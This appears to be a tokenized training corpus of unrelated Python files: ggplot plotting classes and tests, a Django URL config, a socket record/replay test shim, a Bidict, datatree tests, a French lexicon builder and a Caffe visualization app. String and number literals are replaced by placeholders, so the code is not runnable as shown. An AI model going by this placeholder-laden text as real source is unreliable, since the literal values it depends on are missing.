item [ '<STR_LIT>' ] = chart [ '<STR_LIT>' ] <EOL> item [ '<STR_LIT>' ] = chart . get ( '<STR_LIT>' , <NUM_LIT:0> ) <EOL> item [ '<STR_LIT>' ] = chart . get ( '<STR_LIT>' , <NUM_LIT:0> ) <EOL> item [ '<STR_LIT>' ] = chart . get ( '<STR_LIT>' , <NUM_LIT:0> ) <EOL> item [ '<STR_LIT>' ] = chart . get ( '<STR_LIT>' , None ) <EOL> item [ '<STR_LIT>' ] = chart . get ( '<STR_LIT>' , None ) <EOL> item [ '<STR_LIT>' ] = chart . get ( '<STR_LIT>' , None ) <EOL> item [ '<STR_LIT>' ] = chart . get ( '<STR_LIT>' , None ) <EOL> item [ '<STR_LIT>' ] = chart . get ( '<STR_LIT>' , <NUM_LIT:0> ) <EOL> yield item <EOL> def get_ajax_header ( self ) : <EOL> return { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } <EOL> def get_cookies ( self ) : <EOL> return { '<STR_LIT>' : self . access_token } </s>
<s> from django . conf . urls import patterns , include , url <EOL> from django . contrib . staticfiles . urls import staticfiles_urlpatterns <EOL> from django . contrib import admin <EOL> admin . autodiscover ( ) <EOL> urlpatterns = staticfiles_urlpatterns ( ) + patterns ( '<STR_LIT>' , <EOL> url ( r'<STR_LIT>' , include ( admin . site . urls ) ) , <EOL> url ( r'<STR_LIT>' , include ( '<STR_LIT>' , namespace = '<STR_LIT>' ) ) , <EOL> ) </s>
<s> from ggplot import * <EOL> print ( ggplot ( diamonds , aes ( x = '<STR_LIT>' ) ) + geom_histogram ( ) ) <EOL> plt . show ( <NUM_LIT:1> ) </s>
<s> from __future__ import ( absolute_import , division , print_function , <EOL> unicode_literals ) <EOL> from . geom import geom <EOL> class geom_area ( geom ) : <EOL> DEFAULT_AES = { '<STR_LIT>' : None , '<STR_LIT>' : None , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:size>' : <NUM_LIT:1.0> } <EOL> REQUIRED_AES = { '<STR_LIT:x>' , '<STR_LIT>' , '<STR_LIT>' } <EOL> DEFAULT_PARAMS = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } <EOL> _aes_renames = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:size>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } <EOL> _units = { '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' } <EOL> def _plot_unit ( self , pinfo , ax ) : <EOL> pinfo = self . sort_by_x ( pinfo ) <EOL> ax . fill_between ( ** pinfo ) </s>
<s> from __future__ import ( absolute_import , division , print_function , <EOL> unicode_literals ) <EOL> from . scale import scale <EOL> from copy import deepcopy <EOL> class scale_colour_manual ( scale ) : <EOL> """<STR_LIT>""" <EOL> VALID_SCALES = [ '<STR_LIT>' ] <EOL> def __radd__ ( self , gg ) : <EOL> gg = deepcopy ( gg ) <EOL> if not ( self . values is None ) : <EOL> n_colors_needed = gg . data [ gg . aesthetics [ '<STR_LIT>' ] ] . nunique ( ) <EOL> n_colors_provided = len ( self . values ) <EOL> if n_colors_provided < n_colors_needed : <EOL> msg = '<STR_LIT>' <EOL> raise Exception ( msg . format ( n_colors_needed , n_colors_provided ) ) <EOL> gg . manual_color_list = self . values [ : n_colors_needed ] <EOL> return gg </s>
<s> from __future__ import ( absolute_import , division , print_function , <EOL> unicode_literals ) <EOL> from . import get_assert_same_ggplot , cleanup <EOL> assert_same_ggplot = get_assert_same_ggplot ( __file__ ) <EOL> from ggplot import * <EOL> import numpy as np <EOL> import pandas as pd <EOL> def _build_testing_df ( ) : <EOL> df = pd . DataFrame ( { <EOL> "<STR_LIT:x>" : np . arange ( <NUM_LIT:0> , <NUM_LIT:10> ) , <EOL> "<STR_LIT:y>" : np . arange ( <NUM_LIT:0> , <NUM_LIT:10> ) , <EOL> "<STR_LIT:z>" : np . arange ( <NUM_LIT:0> , <NUM_LIT:10> ) , <EOL> "<STR_LIT:a>" : [ <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:3> ] <EOL> } ) <EOL> df [ '<STR_LIT>' ] = np . where ( df . x > <NUM_LIT:4> , '<STR_LIT>' , '<STR_LIT>' ) <EOL> df [ '<STR_LIT>' ] = np . where ( ( df . x % <NUM_LIT:2> ) == <NUM_LIT:0> , '<STR_LIT>' , '<STR_LIT>' ) <EOL> return df <EOL> def _build_small_df ( ) : <EOL> return pd . DataFrame ( { <EOL> "<STR_LIT:x>" : [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:2> ] , <EOL> "<STR_LIT:y>" : [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> ] , <EOL> "<STR_LIT:a>" : [ "<STR_LIT:a>" , "<STR_LIT:b>" , "<STR_LIT:a>" , "<STR_LIT:b>" ] , <EOL> "<STR_LIT:b>" : [ "<STR_LIT:c>" , "<STR_LIT:c>" , "<STR_LIT:d>" , "<STR_LIT:d>" ] <EOL> } ) <EOL> @ cleanup <EOL> def test_facet_grid_continous ( ) : <EOL> df = _build_testing_df ( ) <EOL> p = ggplot ( aes ( x = '<STR_LIT:x>' , y = '<STR_LIT:y>' , colour = '<STR_LIT:z>' ) , data = df ) <EOL> p = p + geom_point ( ) + scale_colour_gradient ( low = "<STR_LIT>" , high = "<STR_LIT>" ) <EOL> p = p + facet_grid ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> assert_same_ggplot ( p , "<STR_LIT>" ) <EOL> @ cleanup <EOL> def test_facet_wrap_continous ( ) : <EOL> df = _build_testing_df ( ) <EOL> p = ggplot ( aes ( x = '<STR_LIT:x>' , y = '<STR_LIT:y>' , colour = '<STR_LIT:z>' ) , data = df ) <EOL> p = p + geom_point ( ) + scale_colour_gradient ( low = "<STR_LIT>" , high = "<STR_LIT>" ) <EOL> p = p + facet_wrap ( "<STR_LIT>" ) <EOL> assert_same_ggplot ( p , "<STR_LIT>" ) </s>
<s> """<STR_LIT>""" <EOL> from copy import deepcopy <EOL> from . element_target import element_target_factory , merge_element_targets <EOL> class theme ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , complete = False , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> self . element_themes = [ ] <EOL> self . complete = complete <EOL> self . _rcParams = { } <EOL> for target_name , theme_element in kwargs . items ( ) : <EOL> self . element_themes . append ( element_target_factory ( target_name , <EOL> theme_element ) ) <EOL> def apply_theme ( self , ax ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def get_rcParams ( self ) : <EOL> """<STR_LIT>""" <EOL> rcParams = deepcopy ( self . _rcParams ) <EOL> if self . element_themes : <EOL> for element_theme in self . element_themes : <EOL> rcparams = element_theme . get_rcParams ( ) <EOL> rcParams . update ( rcparams ) <EOL> return rcParams <EOL> def post_plot_callback ( self , ax ) : <EOL> """<STR_LIT>""" <EOL> self . apply_theme ( ax ) <EOL> for element_theme in self . element_themes : <EOL> element_theme . post_plot_callback ( ax ) <EOL> def add_theme ( self , other ) : <EOL> """<STR_LIT>""" <EOL> if other . complete : <EOL> return other <EOL> else : <EOL> theme_copy = deepcopy ( self ) <EOL> theme_copy . element_themes = merge_element_targets ( <EOL> deepcopy ( self . element_themes ) , <EOL> deepcopy ( other . element_themes ) ) <EOL> return theme_copy <EOL> def __add__ ( self , other ) : <EOL> if isinstance ( other , theme ) : <EOL> return self . add_theme ( other ) <EOL> else : <EOL> raise TypeError ( ) <EOL> def __radd__ ( self , other ) : <EOL> """<STR_LIT>""" <EOL> if not isinstance ( other , theme ) : <EOL> gg_copy = deepcopy ( other ) <EOL> if self . complete : <EOL> gg_copy . theme = self <EOL> else : <EOL> gg_copy . theme = other . theme . add_theme ( self ) <EOL> return gg_copy <EOL> else : <EOL> if self . complete : <EOL> return self <EOL> else : <EOL> theme_copy = deepcopy ( other ) <EOL> theme_copy . element_themes . append ( self ) <EOL> return theme_copy </s>
<s> from socket import socket as _socket <EOL> class socket ( object ) : <EOL> '<STR_LIT>' <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> self . _ss = _socket ( * args , ** kwargs ) <EOL> self . records = [ ] <EOL> self . recording = False <EOL> self . replaying = False <EOL> def start_record ( self ) : <EOL> self . recording = True <EOL> self . replaying = False <EOL> self . records = [ ] <EOL> def start_replay ( self ) : <EOL> self . recording = False <EOL> self . replaying = True <EOL> self . replay_records = self . records [ : ] <EOL> def settimeout ( self , n ) : <EOL> return self . _ss . settimeout ( n ) <EOL> def connect ( self , * args , ** kwargs ) : <EOL> return self . _ss . connect ( * args , ** kwargs ) <EOL> def setsockopt ( self , * args ) : <EOL> if not self . replaying : <EOL> return self . _ss . setsockopt ( * args ) <EOL> def shutdown ( self , * args ) : <EOL> if not self . replaying : <EOL> return self . _ss . shutdown ( * args ) <EOL> def send ( self , buf ) : <EOL> if self . replaying : <EOL> return len ( buf ) <EOL> else : <EOL> return self . _ss . send ( buf ) <EOL> def sendall ( self , buf ) : <EOL> if self . replaying : <EOL> return len ( buf ) <EOL> else : <EOL> return self . _ss . sendall ( buf ) <EOL> def recv ( self , size ) : <EOL> if self . replaying : <EOL> return self . replay_records . pop ( ) <EOL> buf = self . _ss . recv ( size ) <EOL> if self . recording : <EOL> self . records . append ( buf ) <EOL> return buf <EOL> def recv_into ( self , buf ) : <EOL> if self . replaying : <EOL> s = self . replay_records . pop ( ) <EOL> buf [ : len ( s ) ] = s <EOL> return len ( s ) <EOL> ret = self . _ss . recv_into ( buf ) <EOL> if self . recording : <EOL> self . records . append ( buf [ : ret ] ) <EOL> return ret <EOL> def close ( self ) : <EOL> return self . _ss . close ( ) <EOL> import socket as socketmodule <EOL> socketmodule . socket = socket <EOL> def run_with_recording ( sock , func ) : <EOL> sock . start_record ( ) <EOL> func ( ) <EOL> def run_with_replay ( sock , func ) : <EOL> sock . start_replay ( ) <EOL> func ( ) </s>
<s> """<STR_LIT>""" <EOL> import itertools <EOL> class Bidict ( dict ) : <EOL> def __init__ ( self , iterable = ( ) , ** kwargs ) : <EOL> self . update ( iterable , ** kwargs ) <EOL> def update ( self , iterable = ( ) , ** kwargs ) : <EOL> if hasattr ( iterable , '<STR_LIT>' ) : <EOL> iterable = iterable . iteritems ( ) <EOL> for ( key , value ) in itertools . chain ( iterable , kwargs . iteritems ( ) ) : <EOL> self [ key ] = value <EOL> def __setitem__ ( self , key , value ) : <EOL> if key in self : <EOL> del self [ key ] <EOL> if value in self : <EOL> del self [ value ] <EOL> dict . __setitem__ ( self , key , value ) <EOL> dict . __setitem__ ( self , value , key ) <EOL> def __delitem__ ( self , key ) : <EOL> value = self [ key ] <EOL> dict . __delitem__ ( self , key ) <EOL> dict . __delitem__ ( self , value ) <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' % ( type ( self ) . __name__ , dict . __repr__ ( self ) ) </s>
<s> import datetime <EOL> import json <EOL> import numpy as np <EOL> from json import encoder <EOL> encoder . FLOAT_REPR = lambda f : format ( f , '<STR_LIT>' ) <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> class print2f ( float ) : <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % self <EOL> def json_encode ( value ) : <EOL> """<STR_LIT>""" <EOL> return json . dumps ( value ) . replace ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> def json_decode ( value ) : <EOL> """<STR_LIT>""" <EOL> return json . loads ( value ) </s>
<s> import pytest <EOL> from chillaxd import datatree <EOL> class TestDataTree ( object ) : <EOL> def setup_method ( self , method ) : <EOL> self . test_dt = datatree . DataTree ( ) <EOL> def test_create_node ( self ) : <EOL> self . test_dt . create_node ( "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) , <EOL> "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) ) <EOL> assert [ "<STR_LIT:a>" ] == self . test_dt . get_children ( "<STR_LIT:/>" . encode ( "<STR_LIT:utf8>" ) ) <EOL> assert "<STR_LIT>" == self . test_dt . get_data ( "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) ) <EOL> self . test_dt . create_node ( "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) , <EOL> "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) ) <EOL> assert [ "<STR_LIT:a>" ] == self . test_dt . get_children ( "<STR_LIT:/>" . encode ( "<STR_LIT:utf8>" ) ) <EOL> assert "<STR_LIT>" == self . test_dt . get_data ( "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) ) <EOL> assert [ "<STR_LIT:b>" ] == self . test_dt . get_children ( "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) ) <EOL> assert "<STR_LIT>" == self . test_dt . get_data ( "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) ) <EOL> self . test_dt . create_node ( "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) , <EOL> "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) ) <EOL> children = self . test_dt . get_children ( "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) ) <EOL> children . sort ( ) <EOL> assert [ "<STR_LIT:b>" , "<STR_LIT:c>" ] == children <EOL> assert "<STR_LIT>" == self . test_dt . get_data ( "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) ) <EOL> def test_create_node_with_no_parent ( self ) : <EOL> pytest . raises ( datatree . NoNodeException , self . test_dt . create_node , <EOL> "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) , "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) ) <EOL> def test_create_node_with_existing_node ( self ) : <EOL> self . test_dt . create_node ( "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) , <EOL> "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) ) <EOL> pytest . raises ( datatree . NodeExistsException , <EOL> self . test_dt . create_node , "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) , <EOL> "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) ) <EOL> def test_delete_node ( self ) : <EOL> self . test_dt . create_node ( "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) , <EOL> "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) ) <EOL> self . test_dt . create_node ( "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) , <EOL> "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) ) <EOL> self . test_dt . create_node ( "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) , <EOL> "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) ) <EOL> children = self . test_dt . get_children ( "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) ) <EOL> children . sort ( ) <EOL> assert [ "<STR_LIT:b>" , "<STR_LIT:c>" ] == children <EOL> self . test_dt . delete_node ( "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) ) <EOL> assert [ "<STR_LIT:b>" ] == self . test_dt . get_children ( "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) ) <EOL> self . test_dt . delete_node ( "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) ) <EOL> assert [ ] == self . test_dt . get_children ( "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) ) <EOL> self . test_dt . delete_node ( "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) ) <EOL> assert [ ] == self . test_dt . get_children ( "<STR_LIT:/>" . encode ( "<STR_LIT:utf8>" ) ) <EOL> def test_delete_node_with_nonexistent_node ( self ) : <EOL> pytest . raises ( datatree . NoNodeException , self . test_dt . delete_node , <EOL> "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) ) <EOL> pytest . raises ( datatree . NoNodeException , self . test_dt . delete_node , <EOL> "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) ) <EOL> pytest . raises ( datatree . NoNodeException , self . test_dt . delete_node , <EOL> "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) ) <EOL> def test_delete_node_with_children ( self ) : <EOL> self . test_dt . create_node ( "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) , <EOL> "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) ) <EOL> self . test_dt . create_node ( "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) , <EOL> "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) ) <EOL> self . test_dt . create_node ( "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) , <EOL> "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) ) <EOL> pytest . raises ( datatree . NotEmptyException , self . test_dt . delete_node , <EOL> "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) ) <EOL> def test_get_children ( self ) : <EOL> self . test_dt . create_node ( "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) , <EOL> "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) ) <EOL> self . test_dt . create_node ( "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) , <EOL> "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) ) <EOL> children = self . test_dt . get_children ( "<STR_LIT:/>" . encode ( "<STR_LIT:utf8>" ) ) <EOL> children . sort ( ) <EOL> assert [ "<STR_LIT:a>" , "<STR_LIT:b>" ] == children <EOL> pytest . raises ( datatree . NoNodeException , self . test_dt . get_children , <EOL> "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) ) <EOL> pytest . raises ( datatree . NoNodeException , self . test_dt . get_children , <EOL> "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) ) <EOL> def test_get_set_data ( self ) : <EOL> self . test_dt . create_node ( "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) , <EOL> "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) ) <EOL> assert ( str ( "<STR_LIT>" ) == <EOL> self . test_dt . get_data ( "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) ) ) <EOL> self . test_dt . set_data ( "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) , <EOL> "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) ) <EOL> assert ( str ( "<STR_LIT>" ) == <EOL> self . test_dt . get_data ( "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) ) ) <EOL> def test_get_set_data_with_nonexistent_node ( self ) : <EOL> pytest . raises ( datatree . NoNodeException , self . test_dt . set_data , <EOL> "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) , "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) ) <EOL> pytest . raises ( datatree . NoNodeException , self . test_dt . get_data , <EOL> "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) ) <EOL> pytest . raises ( datatree . NoNodeException , self . test_dt . set_data , <EOL> "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) , "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) ) <EOL> pytest . raises ( datatree . NoNodeException , self . test_dt . get_data , <EOL> "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) ) <EOL> pytest . raises ( datatree . NoNodeException , self . test_dt . set_data , <EOL> "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) , "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) ) <EOL> pytest . raises ( datatree . NoNodeException , self . test_dt . get_data , <EOL> "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) ) </s>
<s> """<STR_LIT>""" <EOL> from collections import defaultdict <EOL> from operator import itemgetter <EOL> from base import TextManager <EOL> from utils import load_file , save_to_file <EOL> from sulci . log import sulci_logger <EOL> from corpus import Corpus <EOL> class Lexicon ( TextManager ) : <EOL> """<STR_LIT>""" <EOL> _loaded = { } <EOL> def __init__ ( self , path = "<STR_LIT>" ) : <EOL> self . CORPUS_EXT = "<STR_LIT>" <EOL> self . VALID_EXT = "<STR_LIT>" <EOL> self . PENDING_EXT = "<STR_LIT>" <EOL> self . PATH = path <EOL> self . _raw_content = "<STR_LIT>" <EOL> self . _prefixes = None <EOL> self . _suffixes = None <EOL> self . factors = set ( ) <EOL> def __iter__ ( self ) : <EOL> return self . loaded . __iter__ ( ) <EOL> def __getitem__ ( self , item ) : <EOL> return self . loaded . __getitem__ ( item ) <EOL> def __len__ ( self ) : <EOL> return len ( self . loaded ) <EOL> def items ( self ) : <EOL> return self . loaded . items ( ) <EOL> def __contains__ ( self , key ) : <EOL> if isinstance ( key , object ) and key . __class__ . __name__ == "<STR_LIT>" : <EOL> key = key . original <EOL> return key in self . loaded <EOL> @ property <EOL> def loaded ( self ) : <EOL> """<STR_LIT>""" <EOL> if not self . PATH in self . _loaded : <EOL> sulci_logger . debug ( "<STR_LIT>" , "<STR_LIT>" , True ) <EOL> lx = load_file ( "<STR_LIT>" % self . PATH ) <EOL> self . _loaded [ self . PATH ] = { } <EOL> for line in lx . split ( "<STR_LIT:\n>" ) : <EOL> if line : <EOL> lexicon_entity = LexiconEntity ( line ) <EOL> self . add_factors ( lexicon_entity . word ) <EOL> self . _loaded [ self . PATH ] [ lexicon_entity . word ] = lexicon_entity <EOL> return self . _loaded [ self . PATH ] <EOL> def add_factors ( self , token ) : <EOL> """<STR_LIT>""" <EOL> prefix = token <EOL> while prefix : <EOL> suffix = prefix <EOL> while suffix : <EOL> if not suffix == token : <EOL> self . factors . add ( suffix ) <EOL> suffix = suffix [ <NUM_LIT:1> : ] <EOL> prefix = prefix [ : - <NUM_LIT:1> ] <EOL> def make ( self , force = False ) : <EOL> """<STR_LIT>""" <EOL> final = { } <EOL> lemme_to_original = { } <EOL> C = Corpus ( self . CORPUS_EXT ) <EOL> for tk in C . tokens : <EOL> if tk . verified_tag [ : <NUM_LIT:3> ] == "<STR_LIT>" : <EOL> continue <EOL> if not tk . original in final : <EOL> final [ tk . original ] = defaultdict ( int ) <EOL> final [ tk . original ] [ tk . verified_tag ] += <NUM_LIT:1> <EOL> if not tk . original in lemme_to_original : <EOL> lemme_to_original [ tk . original ] = { } <EOL> if not tk . verified_tag in lemme_to_original [ tk . original ] : <EOL> lemme_to_original [ tk . original ] [ tk . verified_tag ] = defaultdict ( int ) <EOL> lemme_to_original [ tk . original ] [ tk . verified_tag ] [ tk . verified_lemme ] += <NUM_LIT:1> <EOL> def get_one_line ( key ) : <EOL> """<STR_LIT>""" <EOL> return u"<STR_LIT>" % ( key , get_tags ( key ) ) <EOL> def get_tags ( key ) : <EOL> """<STR_LIT>""" <EOL> tags = sorted ( [ ( k , v ) for k , v in final [ key ] . iteritems ( ) ] , <EOL> key = itemgetter ( <NUM_LIT:1> ) , reverse = True ) <EOL> final_data = [ ] <EOL> for tag , score in tags : <EOL> computed_lemmes = get_lemmes ( key , tag ) <EOL> lemme , score = computed_lemmes [ <NUM_LIT:0> ] <EOL> final_data . append ( u"<STR_LIT>" % ( tag , lemme ) ) <EOL> return u"<STR_LIT:U+0020>" . join ( final_data ) <EOL> def get_lemmes ( key , tag ) : <EOL> """<STR_LIT>""" <EOL> return sorted ( ( ( k , v ) for k , v in lemme_to_original [ key ] [ tag ] . iteritems ( ) ) , <EOL> key = itemgetter ( <NUM_LIT:1> ) , reverse = True ) <EOL> d = [ ] <EOL> for k , v in sorted ( final . iteritems ( ) ) : <EOL> d . append ( get_one_line ( k ) ) <EOL> final_d = u"<STR_LIT:\n>" . join ( d ) <EOL> ext = force and self . VALID_EXT or self . PENDING_EXT <EOL> save_to_file ( "<STR_LIT>" % ( self . PATH , ext ) , unicode ( final_d ) ) <EOL> def create_afixes ( self ) : <EOL> """<STR_LIT>""" <EOL> prefixes = defaultdict ( int ) <EOL> suffixes = defaultdict ( int ) <EOL> max_prefix_length = <NUM_LIT:3> <EOL> max_suffix_length = <NUM_LIT:5> <EOL> for tokenstring , _ in self . items ( ) : <EOL> tlen = len ( tokenstring ) <EOL> for i in xrange ( <NUM_LIT:1> , min ( max_prefix_length + <NUM_LIT:1> , tlen ) ) : <EOL> prefix = tokenstring [ <NUM_LIT:0> : i ] <EOL> prefixes [ prefix ] += len ( prefix ) <EOL> for i in xrange ( <NUM_LIT:1> , min ( max_suffix_length + <NUM_LIT:1> , tlen ) ) : <EOL> suffix = tokenstring [ tlen - i : tlen ] <EOL> suffixes [ suffix ] += len ( suffix ) <EOL> self . _prefixes = set ( key for key , value in sorted ( ( ( k , v ) for k , v in prefixes . items ( ) if v > len ( k ) * <NUM_LIT:2> ) , <EOL> key = itemgetter ( <NUM_LIT:1> ) , reverse = True ) ) <EOL> self . _suffixes = set ( key for key , value in sorted ( ( ( k , v ) for k , v in suffixes . items ( ) if v > len ( k ) * <NUM_LIT:2> ) , <EOL> key = itemgetter ( <NUM_LIT:1> ) , reverse = True ) ) <EOL> @ property <EOL> def prefixes ( self ) : <EOL> if self . _prefixes is None : <EOL> self . create_afixes ( ) <EOL> return self . _prefixes <EOL> @ property <EOL> def suffixes ( self ) : <EOL> if self . _suffixes is None : <EOL> self . create_afixes ( ) <EOL> return self . _suffixes <EOL> def get_entry ( self , entry ) : <EOL> if entry in self : <EOL> sulci_logger . info ( unicode ( self [ entry ] ) , "<STR_LIT>" ) <EOL> else : <EOL> sulci_logger . info ( u'<STR_LIT>' % entry , "<STR_LIT>" ) <EOL> def check ( self ) : <EOL> """<STR_LIT>""" <EOL> for key , entity in self . items ( ) : <EOL> if len ( entity . tags ) > <NUM_LIT:1> : <EOL> sulci_logger . info ( u"<STR_LIT>" % ( len ( entity . tags ) , key ) , "<STR_LIT>" ) <EOL> sulci_logger . info ( entity . tags , "<STR_LIT>" ) <EOL> class LexiconEntity ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , raw_data , ** kwargs ) : <EOL> self . default_tag = None <EOL> self . default_lemme = None <EOL> self . word , tags = raw_data . split ( "<STR_LIT:\t>" ) <EOL> self . tags = dict ( ) <EOL> tags = tags . split ( ) <EOL> for one_tag in tags : <EOL> tag , lemme = one_tag . split ( "<STR_LIT:/>" ) <EOL> if self . default_tag is None : <EOL> self . default_tag = tag <EOL> if self . default_lemme is None : <EOL> self . default_lemme = lemme <EOL> self . tags [ tag ] = lemme <EOL> def __unicode__ ( self ) : <EOL> return u"<STR_LIT>" % ( self . word , self . tags ) <EOL> def __contains__ ( self , key ) : <EOL> return self . tags . __contains__ ( key ) <EOL> def __getitem__ ( self , key ) : <EOL> return self . tags [ key ] </s>
<s> import sys <EOL> import os <EOL> import cv2 <EOL> import numpy as np <EOL> import time <EOL> import StringIO <EOL> from misc import WithTimer <EOL> from numpy_cache import FIFOLimitedArrayCache <EOL> from app_base import BaseApp <EOL> from image_misc import norm01 , norm01c , norm0255 , tile_images_normalize , ensure_float01 , tile_images_make_tiles , ensure_uint255_and_resize_to_fit , get_tiles_height_width , get_tiles_height_width_ratio <EOL> from image_misc import FormattedString , cv2_typeset_text , to_255 <EOL> from caffe_proc_thread import CaffeProcThread <EOL> from jpg_vis_loading_thread import JPGVisLoadingThread <EOL> from caffevis_app_state import CaffeVisAppState <EOL> from caffevis_helper import get_pretty_layer_name , read_label_file , load_sprite_image , load_square_sprite_image , check_force_backward_true <EOL> class CaffeVisApp ( BaseApp ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , settings , key_bindings ) : <EOL> super ( CaffeVisApp , self ) . __init__ ( settings , key_bindings ) <EOL> print '<STR_LIT>' , settings <EOL> self . settings = settings <EOL> self . bindings = key_bindings <EOL> self . _net_channel_swap = ( <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:0> ) <EOL> self . _net_channel_swap_inv = tuple ( [ self . _net_channel_swap . index ( ii ) for ii in range ( len ( self . _net_channel_swap ) ) ] ) <EOL> self . _range_scale = <NUM_LIT:1.0> <EOL> sys . path . insert ( <NUM_LIT:0> , os . path . join ( settings . caffevis_caffe_root , '<STR_LIT>' ) ) <EOL> import caffe <EOL> if settings . caffevis_mode_gpu : <EOL> caffe . set_mode_gpu ( ) <EOL> print '<STR_LIT>' <EOL> else : <EOL> caffe . set_mode_cpu ( ) <EOL> print '<STR_LIT>' <EOL> self . net = caffe . Classifier ( <EOL> settings . caffevis_deploy_prototxt , <EOL> settings . caffevis_network_weights , <EOL> mean = None , <EOL> channel_swap = self . _net_channel_swap , <EOL> raw_scale = self . _range_scale , <EOL> ) <EOL> if isinstance ( settings . caffevis_data_mean , basestring ) : <EOL> try : <EOL> self . _data_mean = np . load ( settings . caffevis_data_mean ) <EOL> except IOError : <EOL> print '<STR_LIT>' , settings . caffevis_data_mean <EOL> print '<STR_LIT>' <EOL> print '<STR_LIT>' <EOL> print '<STR_LIT>' <EOL> print '<STR_LIT>' <EOL> raise <EOL> input_shape = self . net . blobs [ self . net . inputs [ <NUM_LIT:0> ] ] . data . shape [ - <NUM_LIT:2> : ] <EOL> excess_h = self . _data_mean . shape [ <NUM_LIT:1> ] - input_shape [ <NUM_LIT:0> ] <EOL> excess_w = self . _data_mean . shape [ <NUM_LIT:2> ] - input_shape [ <NUM_LIT:1> ] <EOL> assert excess_h >= <NUM_LIT:0> and excess_w >= <NUM_LIT:0> , '<STR_LIT>' % repr ( input_shape ) <EOL> self . _data_mean = self . _data_mean [ : , ( excess_h / <NUM_LIT:2> ) : ( excess_h / <NUM_LIT:2> + input_shape [ <NUM_LIT:0> ] ) , <EOL> ( excess_w / <NUM_LIT:2> ) : ( excess_w / <NUM_LIT:2> + input_shape [ <NUM_LIT:1> ] ) ] 